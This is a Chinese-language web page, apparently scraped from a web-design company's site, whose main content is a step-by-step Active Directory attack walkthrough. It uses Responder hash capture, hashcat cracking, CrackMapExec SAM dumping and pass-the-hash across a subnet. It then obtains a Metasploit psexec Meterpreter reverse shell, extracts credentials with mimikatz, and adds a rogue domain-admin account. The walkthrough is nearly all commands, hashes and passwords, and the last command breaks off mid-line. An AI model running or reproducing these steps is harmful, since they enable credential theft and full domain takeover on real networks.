从品牌网站建设到网络营销策划,从策略到执行的一站式服务
Responder探测内网获取域控权限总结
专注于为中小企业提供成都网站建设、网站制作服务,电脑端+手机端+微信端的三站合一,更高效的管理,为中小企业轵城免费做网站提供优质的服务。我们立足成都,凝聚了一批互联网行业人才,有力地推动了上千余家企业的稳健成长,帮助中小企业通过网站建设实现规模扩充和转变。
(1)执行Responder探测内网(https://github.com/lgandx/Responder)
./Responder.py -I eth0 -rPv
(2)获取172.16.157.133的Responder值
(3)使用Crack Map Exec检查此主机的NetBIOS信息
cme smb 172.16.157.133
(4)使用hashcat对Responder值进行破解
hashcat -m 5600 responder /usr/share/wordlists/rockyou.txt -r /usr/share/rules/d3adhob0.rule
获取密码值Winter2018!
(5)CME扫描
cme smb 172.16.157.133 -u FRONTDESK -p 'Winter2018!' --local-auth
(6)获取本地的管理员帐户对本地密码散列进行dump
cme smb 172.16.157.133 -u FRONTDESK -p 'Winter2018!' --local-auth --sam
(7)获取FRONTDESK密码的NTLM哈希值
FRONTDESK:1002:aad3b435b51404eeaad3b435b51404ee:eb6538aa406cfad09403d3bb1f94785f:::
(8)哈希传递方式查看本地网络的smb权限情况
cme smb 172.16.157.0/24 -u administrator -H 'aad3b435b51404eeaad3b435b51404ee:5509de4ff0a6eed7048d9f4a61100e51' --local-
auth
(9)可以登录172.16.157.134服务器
(10)对172.16.157.134进行查看,该计算机具备域控权限
cme smb 172.16.157.134
(11)msf下面利用smb口令进行shell获取
use exploit/windows/smb/psexec
set smbpass=aad3b435b51404eeaad3b435b51404ee:5509de4ff0a6eed7048d9f4a61100e51
set smbuser administrator
set playload windows/x64/meterpreter/reverse_tcp
run
getuid
(12)使用mimikatz获取域控密码
load mimikatz
kerberos
cme smb 172.16.157.135 -u administrator -p 'October17' -x 'net user markitzeroda hackersPassword! /add /domain /y && net group "domain admins" markitzeroda
成都网站建设公司地址:成都市青羊区太升南路288号锦天国际A座10层 建设咨询028-86922220
成都快上网科技有限公司-四川网站建设设计公司 | 蜀ICP备19037934号 Copyright 2020,ALL Rights Reserved cdkjz.cn | 成都网站建设 | © Copyright 2020版权所有.
专家团队为您提供成都网站建设,成都网站设计,成都品牌网站设计,成都营销型网站制作等服务,成都建网站就找快上网! | 成都网站建设哪家好? | 网站建设地图